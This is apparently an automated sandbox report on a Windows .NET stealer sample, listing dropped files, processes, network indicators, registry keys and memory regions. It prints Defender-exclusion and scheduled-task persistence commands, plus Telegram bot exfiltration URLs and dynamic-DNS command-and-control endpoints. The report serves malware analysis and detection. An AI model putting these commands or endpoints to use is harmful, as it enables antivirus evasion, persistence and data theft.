Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
e-dekont_html.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\e-dekont_html.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\tmp7653.tmp
|
XML 1.0 document, ASCII text
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\fahKSvwo.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\fahKSvwo.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fahKSvwo.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iz120nfz.j4v.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrnkzrin.mp3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ksvqv0pp.2er.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vpgolwsw.511.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2byhtnc.1s3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4rhnfbd.ktt.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xaevxprt.bw5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zbt02phu.xls.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\tmp8A49.tmp
|
XML 1.0 document, ASCII text
|
dropped
|
There are 6 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\e-dekont_html.exe
|
"C:\Users\user\Desktop\e-dekont_html.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fahKSvwo.exe"
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp"
|
|
|
|
C:\Users\user\Desktop\e-dekont_html.exe
|
"C:\Users\user\Desktop\e-dekont_html.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\fahKSvwo.exe
|
C:\Users\user\AppData\Roaming\fahKSvwo.exe
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp8A49.tmp"
|
|
|
|
C:\Users\user\AppData\Roaming\fahKSvwo.exe
|
"C:\Users\user\AppData\Roaming\fahKSvwo.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 3 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://www.fontbureau.com/designersG
|
unknown
|
||
|
http://www.fontbureau.com/designers/?
|
unknown
|
||
|
http://www.founder.com.cn/cn/bThe
|
unknown
|
||
|
https://api.telegram.org
|
unknown
|
||
|
https://api.telegram.org/bot
|
unknown
|
||
|
http://www.fontbureau.com/designers?
|
unknown
|
||
|
http://www.tiro.com
|
unknown
|
||
|
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20a
|
unknown
|
||
|
http://www.fontbureau.com/designers
|
unknown
|
||
|
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
|
unknown
|
||
|
http://www.goodfont.co.kr
|
unknown
|
||
|
https://chrome.google.com/webstore?hl=en
|
unknown
|
||
|
http://tempuri.org/project_mgtDataSet.xsdOproject_mgt_system.Properties.Resources
|
unknown
|
||
|
http://varders.kozow.com:8081
|
unknown
|
||
|
http://www.sajatypeworks.com
|
unknown
|
||
|
http://www.typography.netD
|
unknown
|
||
|
http://www.founder.com.cn/cn/cThe
|
unknown
|
||
|
http://www.galapagosdesign.com/staff/dennis.htm
|
unknown
|
||
|
http://checkip.dyndns.org/
|
193.122.130.0
|
||
|
https://reallyfreegeoip.org/xml/8.46.123.75$
|
unknown
|
||
|
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
|
unknown
|
||
|
http://checkip.dyndns.org/q
|
unknown
|
||
|
http://www.galapagosdesign.com/DPlease
|
unknown
|
||
|
http://www.fonts.com
|
unknown
|
||
|
http://www.sandoll.co.kr
|
unknown
|
||
|
http://www.urwpp.deDPlease
|
unknown
|
||
|
http://www.zhongyicts.com.cn
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.sakkal.com
|
unknown
|
||
|
https://chrome.google.com/webstore?hl=enlBfq
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/
|
unknown
|
||
|
https://www.office.com/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://www.fontbureau.com
|
unknown
|
||
|
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2016:24:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
|
149.154.167.220
|
||
|
http://checkip.dyndns.org
|
unknown
|
||
|
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
|
unknown
|
||
|
https://api.telegram.org/bot/sendMessage?chat_id=&text=
|
unknown
|
||
|
https://www.office.com/lBfq
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/8.46.123.75
|
188.114.97.3
|
||
|
http://www.carterandcone.coml
|
unknown
|
||
|
http://aborters.duckdns.org:8081
|
unknown
|
||
|
http://www.fontbureau.com/designers/cabarga.htmlN
|
unknown
|
||
|
http://www.founder.com.cn/cn
|
unknown
|
||
|
http://www.fontbureau.com/designers/frere-user.html
|
unknown
|
||
|
http://anotherarmy.dns.army:8081
|
unknown
|
||
|
http://www.jiyu-kobo.co.jp/
|
unknown
|
||
|
https://reallyfreegeoip.org
|
unknown
|
||
|
http://www.fontbureau.com/designers8
|
unknown
|
||
|
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
|
unknown
|
||
|
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2017:43:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
|
149.154.167.220
|
||
|
https://chrome.google.com/webstore?hl=enX~
|
unknown
|
||
|
https://www.office.com/X~
|
unknown
|
||
|
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
|
unknown
|
There are 44 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
reallyfreegeoip.org
|
188.114.97.3
|
||
|
api.telegram.org
|
149.154.167.220
|
||
|
checkip.dyndns.com
|
193.122.130.0
|
||
|
checkip.dyndns.org
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
|
188.114.97.3
|
reallyfreegeoip.org
|
European Union
|
||
|
188.114.96.3
|
unknown
|
European Union
|
||
|
193.122.130.0
|
checkip.dyndns.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\e-dekont_html_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\e-dekont_html_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\e-dekont_html_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\e-dekont_html_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\e-dekont_html_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\e-dekont_html_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\e-dekont_html_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\e-dekont_html_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\e-dekont_html_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\e-dekont_html_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\e-dekont_html_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\e-dekont_html_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\e-dekont_html_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\e-dekont_html_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fahKSvwo_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fahKSvwo_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fahKSvwo_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fahKSvwo_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fahKSvwo_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fahKSvwo_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fahKSvwo_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fahKSvwo_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fahKSvwo_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fahKSvwo_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fahKSvwo_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fahKSvwo_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fahKSvwo_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fahKSvwo_RASMANCS
|
FileDirectory
|
There are 19 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
42E000
|
remote allocation
|
page execute and read and write
|
|
|
|
2D91000
|
trusted library allocation
|
page read and write
|
|
|
|
3C49000
|
trusted library allocation
|
page read and write
|
|
|
|
32A1000
|
trusted library allocation
|
page read and write
|
|
|
|
6B70000
|
trusted library allocation
|
page read and write
|
||
|
40E000
|
remote allocation
|
page execute and read and write
|
||
|
2E99000
|
trusted library allocation
|
page read and write
|
||
|
331A000
|
trusted library allocation
|
page read and write
|
||
|
3D6E000
|
trusted library allocation
|
page read and write
|
||
|
3530000
|
heap
|
page read and write
|
||
|
3170000
|
heap
|
page read and write
|
||
|
B70E000
|
stack
|
page read and write
|
||
|
1253000
|
trusted library allocation
|
page read and write
|
||
|
6EA0000
|
trusted library allocation
|
page read and write
|
||
|
5E95000
|
heap
|
page read and write
|
||
|
6B60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1580000
|
heap
|
page execute and read and write
|
||
|
4386000
|
trusted library allocation
|
page read and write
|
||
|
53C0000
|
heap
|
page read and write
|
||
|
5320000
|
trusted library section
|
page readonly
|
||
|
D69000
|
heap
|
page read and write
|
||
|
3E45000
|
trusted library allocation
|
page read and write
|
||
|
8C62000
|
heap
|
page read and write
|
||
|
364C000
|
trusted library allocation
|
page read and write
|
||
|
2F7F000
|
trusted library allocation
|
page read and write
|
||
|
2C8F000
|
stack
|
page read and write
|
||
|
12D0000
|
trusted library allocation
|
page read and write
|
||
|
1620000
|
trusted library allocation
|
page read and write
|
||
|
1272000
|
trusted library allocation
|
page read and write
|
||
|
5142000
|
trusted library allocation
|
page read and write
|
||
|
40CF000
|
trusted library allocation
|
page read and write
|
||
|
4562000
|
trusted library allocation
|
page read and write
|
||
|
346F000
|
stack
|
page read and write
|
||
|
1277000
|
trusted library allocation
|
page execute and read and write
|
||
|
406000
|
remote allocation
|
page execute and read and write
|
||
|
5156000
|
trusted library allocation
|
page read and write
|
||
|
12A0000
|
trusted library allocation
|
page read and write
|
||
|
3E61000
|
trusted library allocation
|
page read and write
|
||
|
3223000
|
trusted library allocation
|
page read and write
|
||
|
40C2000
|
trusted library allocation
|
page read and write
|
||
|
3312000
|
trusted library allocation
|
page read and write
|
||
|
2E38000
|
trusted library allocation
|
page read and write
|
||
|
436000
|
remote allocation
|
page execute and read and write
|
||
|
3E9C000
|
trusted library allocation
|
page read and write
|
||
|
1705000
|
heap
|
page read and write
|
||
|
F56000
|
heap
|
page read and write
|
||
|
68C0000
|
heap
|
page read and write
|
||
|
3280000
|
trusted library allocation
|
page read and write
|
||
|
8C5C000
|
heap
|
page read and write
|
||
|
3485000
|
trusted library allocation
|
page read and write
|
||
|
32F0000
|
trusted library allocation
|
page read and write
|
||
|
2BF0000
|
heap
|
page execute and read and write
|
||
|
3266000
|
trusted library allocation
|
page read and write
|
||
|
2E44000
|
trusted library allocation
|
page read and write
|
||
|
1678000
|
heap
|
page read and write
|
||
|
43D6000
|
trusted library allocation
|
page read and write
|
||
|
5560000
|
trusted library allocation
|
page read and write
|
||
|
5800000
|
trusted library allocation
|
page execute and read and write
|
||
|
1080000
|
heap
|
page read and write
|
||
|
435B000
|
trusted library allocation
|
page read and write
|
||
|
460D000
|
trusted library allocation
|
page read and write
|
||
|
51F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
BA40000
|
heap
|
page read and write
|
||
|
452F000
|
trusted library allocation
|
page read and write
|
||
|
FCE000
|
stack
|
page read and write
|
||
|
F4A000
|
heap
|
page read and write
|
||
|
411000
|
remote allocation
|
page execute and read and write
|
||
|
73F0000
|
trusted library allocation
|
page read and write
|
||
|
166B000
|
heap
|
page read and write
|
||
|
407000
|
remote allocation
|
page execute and read and write
|
||
|
12B5000
|
trusted library allocation
|
page execute and read and write
|
||
|
6B3D000
|
stack
|
page read and write
|
||
|
B98C000
|
stack
|
page read and write
|
||
|
4052000
|
trusted library allocation
|
page read and write
|
||
|
6610000
|
heap
|
page read and write
|
||
|
3386000
|
trusted library allocation
|
page read and write
|
||
|
12F7000
|
stack
|
page read and write
|
||
|
154A000
|
trusted library allocation
|
page execute and read and write
|
||
|
5110000
|
trusted library allocation
|
page read and write
|
||
|
128B000
|
trusted library allocation
|
page execute and read and write
|
||
|
1254000
|
trusted library allocation
|
page read and write
|
||
|
35F1000
|
trusted library allocation
|
page read and write
|
||
|
2BD0000
|
heap
|
page read and write
|
||
|
1733000
|
heap
|
page read and write
|
||
|
104A000
|
heap
|
page read and write
|
||
|
4018000
|
trusted library allocation
|
page read and write
|
||
|
4628000
|
trusted library allocation
|
page read and write
|
||
|
555A000
|
trusted library allocation
|
page read and write
|
||
|
D4E000
|
heap
|
page read and write
|
||
|
BE3E000
|
stack
|
page read and write
|
||
|
2E02000
|
trusted library allocation
|
page read and write
|
||
|
409000
|
remote allocation
|
page execute and read and write
|
||
|
8A0000
|
unkown
|
page readonly
|
||
|
3316000
|
trusted library allocation
|
page read and write
|
||
|
8F00000
|
trusted library allocation
|
page execute and read and write
|
||
|
4602000
|
trusted library allocation
|
page read and write
|
||
|
71BE000
|
stack
|
page read and write
|
||
|
3FEF000
|
trusted library allocation
|
page read and write
|
||
|
5680000
|
trusted library allocation
|
page execute and read and write
|
||
|
125D000
|
trusted library allocation
|
page execute and read and write
|
||
|
D76000
|
heap
|
page read and write
|
||
|
3DB9000
|
trusted library allocation
|
page read and write
|
||
|
2E06000
|
trusted library allocation
|
page read and write
|
||
|
3F53000
|
trusted library allocation
|
page read and write
|
||
|
5712000
|
trusted library allocation
|
page read and write
|
||
|
1552000
|
trusted library allocation
|
page read and write
|
||
|
34EC000
|
trusted library allocation
|
page read and write
|
||
|
3E70000
|
trusted library allocation
|
page read and write
|
||
|
4554000
|
trusted library allocation
|
page read and write
|
||
|
1542000
|
trusted library allocation
|
page read and write
|
||
|
3280000
|
trusted library allocation
|
page read and write
|
||
|
4064000
|
trusted library allocation
|
page read and write
|
||
|
3E80000
|
trusted library allocation
|
page read and write
|
||
|
12B2000
|
trusted library allocation
|
page read and write
|
||
|
1290000
|
trusted library allocation
|
page read and write
|
||
|
3273000
|
heap
|
page read and write
|
||
|
55B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6A90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1243000
|
trusted library allocation
|
page execute and read and write
|
||
|
3250000
|
heap
|
page read and write
|
||
|
6BE0000
|
heap
|
page read and write
|
||
|
7400000
|
trusted library allocation
|
page read and write
|
||
|
4647000
|
trusted library allocation
|
page read and write
|
||
|
5568000
|
trusted library allocation
|
page read and write
|
||
|
5700000
|
trusted library allocation
|
page read and write
|
||
|
31C7000
|
trusted library allocation
|
page read and write
|
||
|
101A000
|
heap
|
page read and write
|
||
|
42A1000
|
trusted library allocation
|
page read and write
|
||
|
45D4000
|
trusted library allocation
|
page read and write
|
||
|
4486000
|
trusted library allocation
|
page read and write
|
||
|
5E90000
|
heap
|
page read and write
|
||
|
1590000
|
trusted library allocation
|
page execute and read and write
|
||
|
F40000
|
heap
|
page read and write
|
||
|
6EB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4626000
|
trusted library allocation
|
page read and write
|
||
|
43E000
|
remote allocation
|
page execute and read and write
|
||
|
BB0000
|
heap
|
page read and write
|
||
|
B93E000
|
stack
|
page read and write
|
||
|
1067000
|
heap
|
page read and write
|
||
|
329A000
|
heap
|
page read and write
|
||
|
15B4000
|
trusted library allocation
|
page read and write
|
||
|
5250000
|
trusted library allocation
|
page read and write
|
||
|
5440000
|
trusted library allocation
|
page read and write
|
||
|
3199000
|
trusted library allocation
|
page read and write
|
||
|
127A000
|
trusted library allocation
|
page execute and read and write
|
||
|
313E000
|
trusted library allocation
|
page read and write
|
||
|
CF7000
|
stack
|
page read and write
|
||
|
3FDA000
|
trusted library allocation
|
page read and write
|
||
|
56E0000
|
trusted library allocation
|
page read and write
|
||
|
10E9000
|
heap
|
page read and write
|
||
|
5D60000
|
heap
|
page read and write
|
||
|
34BB000
|
trusted library allocation
|
page read and write
|
||
|
3494000
|
trusted library allocation
|
page read and write
|
||
|
511B000
|
trusted library allocation
|
page read and write
|
||
|
FE8000
|
heap
|
page read and write
|
||
|
1083000
|
heap
|
page read and write
|
||
|
516B000
|
trusted library allocation
|
page read and write
|
||
|
177F000
|
stack
|
page read and write
|
||
|
303D000
|
stack
|
page read and write
|
||
|
51E0000
|
heap
|
page read and write
|
||
|
3FF5000
|
trusted library allocation
|
page read and write
|
||
|
B4A000
|
stack
|
page read and write
|
||
|
5566000
|
trusted library allocation
|
page read and write
|
||
|
7740000
|
trusted library section
|
page read and write
|
||
|
12BB000
|
trusted library allocation
|
page execute and read and write
|
||
|
4005000
|
trusted library allocation
|
page read and write
|
||
|
12AA000
|
trusted library allocation
|
page execute and read and write
|
||
|
5710000
|
heap
|
page read and write
|
||
|
3370000
|
heap
|
page read and write
|
||
|
2F21000
|
trusted library allocation
|
page read and write
|
||
|
3344000
|
trusted library allocation
|
page read and write
|
||
|
3458000
|
trusted library allocation
|
page read and write
|
||
|
126E000
|
stack
|
page read and write
|
||
|
6681000
|
heap
|
page read and write
|
||
|
2B8F000
|
stack
|
page read and write
|
||
|
3450000
|
trusted library allocation
|
page read and write
|
||
|
103E000
|
stack
|
page read and write
|
||
|
430A000
|
trusted library allocation
|
page read and write
|
||
|
6AFE000
|
stack
|
page read and write
|
||
|
B83E000
|
stack
|
page read and write
|
||
|
5210000
|
trusted library allocation
|
page execute and read and write
|
||
|
1523000
|
trusted library allocation
|
page execute and read and write
|
||
|
BD5000
|
heap
|
page read and write
|
||
|
5C80000
|
trusted library allocation
|
page read and write
|
||
|
2C4C000
|
stack
|
page read and write
|
||
|
3EC6000
|
trusted library allocation
|
page read and write
|
||
|
40B5000
|
trusted library allocation
|
page read and write
|
||
|
3E68000
|
trusted library allocation
|
page read and write
|
||
|
528A000
|
trusted library allocation
|
page read and write
|
||
|
2FA2000
|
trusted library allocation
|
page read and write
|
||
|
FD0000
|
heap
|
page read and write
|
||
|
6D7E000
|
stack
|
page read and write
|
||
|
5280000
|
heap
|
page read and write
|
||
|
4505000
|
trusted library allocation
|
page read and write
|
||
|
2F79000
|
trusted library allocation
|
page read and write
|
||
|
444D000
|
trusted library allocation
|
page read and write
|
||
|
1520000
|
trusted library allocation
|
page read and write
|
||
|
153D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1200000
|
heap
|
page read and write
|
||
|
3EDD000
|
trusted library allocation
|
page read and write
|
||
|
D37000
|
stack
|
page read and write
|
||
|
C3A000
|
stack
|
page read and write
|
||
|
1253000
|
trusted library allocation
|
page execute and read and write
|
||
|
342E000
|
stack
|
page read and write
|
||
|
6BB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
690E000
|
stack
|
page read and write
|
||
|
6FE0000
|
heap
|
page read and write
|
||
|
2E3C000
|
trusted library allocation
|
page read and write
|
||
|
3EE5000
|
trusted library allocation
|
page read and write
|
||
|
3DB1000
|
trusted library allocation
|
page read and write
|
||
|
C0AC000
|
stack
|
page read and write
|
||
|
3C91000
|
trusted library allocation
|
page read and write
|
||
|
2FAB000
|
trusted library allocation
|
page read and write
|
||
|
374F000
|
stack
|
page read and write
|
||
|
438B000
|
trusted library allocation
|
page read and write
|
||
|
412000
|
remote allocation
|
page execute and read and write
|
||
|
B9CE000
|
stack
|
page read and write
|
||
|
2C70000
|
trusted library allocation
|
page read and write
|
||
|
4E1B000
|
stack
|
page read and write
|
||
|
3E84000
|
trusted library allocation
|
page read and write
|
||
|
2E76000
|
trusted library allocation
|
page read and write
|
||
|
54FE000
|
stack
|
page read and write
|
||
|
D4A000
|
heap
|
page read and write
|
||
|
2F46000
|
trusted library allocation
|
page read and write
|
||
|
14CF000
|
stack
|
page read and write
|
||
|
2FAD000
|
stack
|
page read and write
|
||
|
127B000
|
trusted library allocation
|
page execute and read and write
|
||
|
6B5A000
|
trusted library allocation
|
page read and write
|
||
|
319E000
|
stack
|
page read and write
|
||
|
45EA000
|
trusted library allocation
|
page read and write
|
||
|
5131000
|
trusted library allocation
|
page read and write
|
||
|
316B000
|
trusted library allocation
|
page read and write
|
||
|
9EA000
|
stack
|
page read and write
|
||
|
1546000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D08000
|
trusted library allocation
|
page read and write
|
||
|
1266000
|
trusted library allocation
|
page execute and read and write
|
||
|
570D000
|
trusted library allocation
|
page read and write
|
||
|
5264000
|
trusted library section
|
page readonly
|
||
|
780E000
|
stack
|
page read and write
|
||
|
56FE000
|
trusted library allocation
|
page read and write
|
||
|
361F000
|
trusted library allocation
|
page read and write
|
||
|
556D000
|
trusted library allocation
|
page read and write
|
||
|
45D2000
|
trusted library allocation
|
page read and write
|
||
|
BC0E000
|
stack
|
page read and write
|
||
|
73A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
BACE000
|
stack
|
page read and write
|
||
|
128D000
|
trusted library allocation
|
page execute and read and write
|
||
|
C0ED000
|
stack
|
page read and write
|
||
|
126D000
|
trusted library allocation
|
page execute and read and write
|
||
|
451C000
|
trusted library allocation
|
page read and write
|
||
|
2B60000
|
trusted library allocation
|
page execute and read and write
|
||
|
3251000
|
trusted library allocation
|
page read and write
|
||
|
14F0000
|
heap
|
page read and write
|
||
|
1015000
|
heap
|
page read and write
|
||
|
D83000
|
heap
|
page read and write
|
||
|
3358000
|
trusted library allocation
|
page read and write
|
||
|
7250000
|
trusted library allocation
|
page execute and read and write
|
||
|
43C000
|
remote allocation
|
page execute and read and write
|
||
|
F3E000
|
heap
|
page read and write
|
||
|
56EE000
|
trusted library allocation
|
page read and write
|
||
|
3E4F000
|
trusted library allocation
|
page read and write
|
||
|
443000
|
remote allocation
|
page execute and read and write
|
||
|
2F27000
|
trusted library allocation
|
page read and write
|
||
|
5E00000
|
trusted library allocation
|
page read and write
|
||
|
51D0000
|
heap
|
page read and write
|
||
|
BA3D000
|
stack
|
page read and write
|
||
|
76FE000
|
stack
|
page read and write
|
||
|
2F44000
|
trusted library allocation
|
page read and write
|
||
|
2B80000
|
heap
|
page read and write
|
||
|
40D6000
|
trusted library allocation
|
page read and write
|
||
|
3290000
|
heap
|
page read and write
|
||
|
5160000
|
trusted library allocation
|
page read and write
|
||
|
4571000
|
trusted library allocation
|
page read and write
|
||
|
6AB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
378F000
|
trusted library allocation
|
page read and write
|
||
|
4C48000
|
trusted library allocation
|
page read and write
|
||
|
2C00000
|
trusted library allocation
|
page read and write
|
||
|
12A0000
|
trusted library allocation
|
page read and write
|
||
|
2D05000
|
trusted library allocation
|
page read and write
|
||
|
3350000
|
trusted library allocation
|
page read and write
|
||
|
1240000
|
trusted library allocation
|
page read and write
|
||
|
6EC2000
|
trusted library allocation
|
page read and write
|
||
|
2DE0000
|
trusted library allocation
|
page read and write
|
||
|
6954000
|
heap
|
page read and write
|
||
|
3360000
|
trusted library allocation
|
page read and write
|
||
|
660E000
|
stack
|
page read and write
|
||
|
1287000
|
trusted library allocation
|
page execute and read and write
|
||
|
56FA000
|
trusted library allocation
|
page read and write
|
||
|
8C20000
|
heap
|
page read and write
|
||
|
8A2000
|
unkown
|
page readonly
|
||
|
2F1D000
|
trusted library allocation
|
page read and write
|
||
|
40E7000
|
trusted library allocation
|
page read and write
|
||
|
6F50000
|
trusted library allocation
|
page read and write
|
||
|
4435000
|
trusted library allocation
|
page read and write
|
||
|
3463000
|
trusted library allocation
|
page read and write
|
||
|
5CD0000
|
heap
|
page read and write
|
||
|
4622000
|
trusted library allocation
|
page read and write
|
||
|
45FA000
|
trusted library allocation
|
page read and write
|
||
|
2BF0000
|
trusted library allocation
|
page read and write
|
||
|
566D000
|
stack
|
page read and write
|
||
|
12B0000
|
trusted library allocation
|
page read and write
|
||
|
3E82000
|
trusted library allocation
|
page read and write
|
||
|
125D000
|
trusted library allocation
|
